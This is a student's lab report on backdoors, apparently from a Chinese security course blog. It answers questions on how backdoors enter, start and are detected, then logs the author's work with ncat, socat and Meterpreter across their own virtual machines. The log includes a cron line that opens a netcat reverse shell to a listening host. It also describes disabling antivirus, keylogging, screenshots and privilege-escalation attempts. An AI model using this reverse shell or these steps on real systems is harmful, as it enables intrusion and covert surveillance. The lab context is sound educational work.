20145212罗天晨 后门原理与实践

20145212罗天晨 后门原理与实践


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 我们在安装常用应用软件时,安装过程中附带的可能就有后门程序。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
  • linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 可以获取目标主机摄像头摄像头摄像头!!!这个功能好可怕……
  • 可以提权,并且针对不同的系统,提权的方式有很多种,由于我在实验中尝试用getsystem提权失败之后上网查看了教程,愈发觉得meterpreter很强大很可怕。。其中找到一篇写了windows下各种提权方法的博客,我后来的提权操作也是从这里借鉴的:
    Windows的多种提权方法

(4)如何发现自己有系统有没有被安装后门?

  • 低级一点的后门程序估计寻常的杀毒软件就可以查杀,比如我这次实验做的,一发送给win10主机就被360毙了。
  • 至于隐藏的稍深一些的后门,例如与软件捆绑的后门,我查了一下方法,可以下载一些比较专业的监视软件,例如下载者监视器1.0、Regmon704.rar等进行检测。
  • 还可以用抓包工具分析可疑软件是否有可疑操作,比如连接了一些乱七八糟的ip、在注册表项里操作了之类的。

实验总结体会

做了这次实验觉得小时候看起来无懈可击的电脑实际上漏洞百出,很容易就能被攻击。而且一些后门的存在让人有些无力感,因为windows操作系统本身就极有可能被留有后门……这样的话就算自己再怎么查杀也还是无法幸免,而且其他的操作系统大概也是一样的,感觉好不安。


实践过程记录

一、ncat的使用

1.实现两台虚拟机的互联

  • 本实验中实现了与5226夏艺华的虚拟机互联,以下是对话截图=..=

2.让本机的Windows获得Linux的Shell

  • 如图所示,使用本机windows系统获得linux系统的shell:

3.让linux获得windows的shell

  • 如图所示,在虚拟机中获得了windows的shell之后我输入了ipconfig,成功查看到了windows本机的ip地址信息,不过有很多乱码。

4.使用ncat实现文件传输

  • 如图所示,先在windows中打开监听,然后在linux系统中发送文件:

  • 传输的文件保存在了C:\Users\Lenovo路径下,可以查看:(一开始以为保存在ncat所在的文件目录下=o=找了半天)

5.cron的启动

  • 这里首先在linux中输入crontab -e指令,通过编辑增加一条定时任务
    从图中可以看出我输入的是29 * * * * /bin/netcat 10.1.1.120 5212 -e /bin/sh
    意味着在每个小时的29分,如果有一台ip地址为10.1.1.120的主机监听着linux,就会得到一个shell

  • 29分之前在主机上输入什么都不会有显示,但是一到29分,就可以使用指令查看虚拟机中的相关信息,这里我使用了ls指令,结果如下:

……比较好奇为什么这里使用ls查看到的内容和第二步让本机的Windows获得Linux的Shell中查看到的不一样,而且有乱码…


二、socat的使用

使用socat获取主机操作Shell

  • 原理和之前使用ncat的时候是一样的,这次在linux上绑定端口并且反弹连接,使用windows系统开启监听
  • 这里也是在成功之后使用了ifconfig和ls进行测试:


任务计划启动

  • 在主机的控制面板中找到计划任务,打开任务计划程序,创建一个新任务,在操作选项中选择如下:

  • 进行测试:


三、meterpreter的使用

1.生成后门程序

  • 在虚拟机上使用指令生成后门程序,并通过ncat发送到windows主机上

  • 这里没关360的时候直接被发现并且查杀了……

  • 关闭360之后,打开msf进行相关设置,将端口号和ip地址都改成和生成后门程序时一样的数据,再在windows上运行后门程序:

  • 得到shell,输入dir可以显示windows的磁盘目录信息:

  • 可以通过shell指令得到windows的命令行界面,部分乱码可以忽略,这里使用了slmgr/div命令进行测试,主机上弹出版本号信息:

  • 对windows主机进行击键记录:

  • 对主机进行截屏并查看:

  • 安装系统服务:

  • 提升权限:

输入getuid查看当前用户权限
输入getsystem进行提权,但是这里显示由于环境错误,提权失败

换提权方式:使用MS14-058之类的Exp进行提权,结果这个模块对于64为机不适用

再换==这次显示win10不易受这个攻击??

我是该高兴自己的win10稍微安全那么一点点吗?……试了半天发现都没有正确的攻破win10……于是果断的换成了攻击我安装的win7虚拟机……
成功的进行了提权:

posted @ 2017-03-14 22:05  20145212罗天晨  阅读(516)  评论(0编辑  收藏  举报